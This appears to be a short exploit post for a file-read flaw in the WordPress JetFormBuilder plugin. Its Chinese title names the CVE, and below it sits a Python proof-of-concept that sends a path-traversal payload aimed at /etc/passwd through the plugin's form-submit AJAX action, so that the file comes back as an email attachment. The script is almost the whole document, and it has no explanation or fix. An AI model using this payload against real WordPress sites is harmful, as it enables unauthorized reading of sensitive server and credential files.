CVE-2026-4373: WordPress JetFormBuilder 任意文件读取漏洞

import requests # Target URL configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # Payload exploiting path traversal via Media Field # The vulnerable parameter allows specifying a file path directly payload = { "action": "jet_form_builder_form_submit", "form_data": { "media_field": { "path": "../../../../../../etc/passwd" # Path traversal to read sensitive files } }, "form_id": "1" # Example Form ID } try: response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Request sent successfully. Check email for the file attachment.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")